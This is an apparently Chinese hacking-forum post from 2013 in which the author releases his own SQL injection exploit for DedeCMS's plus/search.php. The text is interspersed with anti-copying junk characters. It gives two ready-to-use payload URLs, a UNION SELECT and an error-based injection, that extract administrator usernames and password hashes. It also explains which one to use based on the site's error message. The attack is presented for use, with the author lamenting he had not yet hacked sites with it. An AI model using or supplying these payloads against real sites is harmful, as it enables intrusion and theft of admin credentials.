转载不加作者名的没JJ+ \! A' ]% }, G4 ?$ F/ N9 b( M2 M7 t
! ?3 _8 U' I! D! |+ a2 ]哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
( s! l$ H2 S) S. L- k: k
K' g& ~' u' H8 R/ [$ b/ X1 D! E7 b既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
' D: f. S- P+ \- T1 `7 Y0 d, S* i/ \! A( ]6 }
我一般是这样测试的:. y( U( Y0 V. K1 [' q5 D
, e6 |% q2 x7 ~" r! J
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
V% S2 q- _% D7 K! g, f! @0 g
8 d3 V. U0 A2 [$ ~! m7 u u0 d" m转载不加作者名的没JJ
6 c: p, {3 h" t7 H8 j
5 A4 L O- D/ X0 C& [% r作者:鬼哥: f' B, Y* s# p6 u/ \( X: i; }) p
. I% G9 Z# V3 Q% _3 W3 g' V' l
; G4 h% O. E9 m6 f. ]
' h. j4 F0 ]( S B/ c1 J5 E. z看结果如果提示* H5 B' }8 t* [- ]$ N& ?
. ?+ H+ r! F8 a' YSafe Alert: Request Error step 2 !
3 G: r+ a4 F/ |- y
* ` p( P6 x0 }: B: @# b2 \# L0 c那么直接用下面的exp0 P! [' `8 C. w- r
z! S, q: e5 `& O/ h9 O0 [xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
. O. w3 [ Y! [6 d; q8 h p/ l) [) D# V# {# T
8 g5 G& r9 L0 @* U# x/ {. F
看结果如果提示
6 A) z5 Y) P8 G8 k; F- e# n
/ x, j0 F9 G) A( c- m0 {8 E0 bSafe Alert: Request Error step 1 !
( H/ a1 }( S# O. p |
6 v5 l5 v8 b, z2 [: e" a" S1 J: a4 ]那么直接用下面的exp
" |. o$ ]% B; l; Y; X& j% V$ Q. [1 q- U( r4 f
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a2 v/ A, p: u' X, T @; W2 J
* T- O( m3 U7 o z
- Z3 S7 z0 k+ i- U1 T/ w( x9 r如果正常显示证明漏洞不存在了。; B; M1 K4 I7 y# S% O
/ R! X9 t6 r7 w- {+ Y2 z( l. p
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对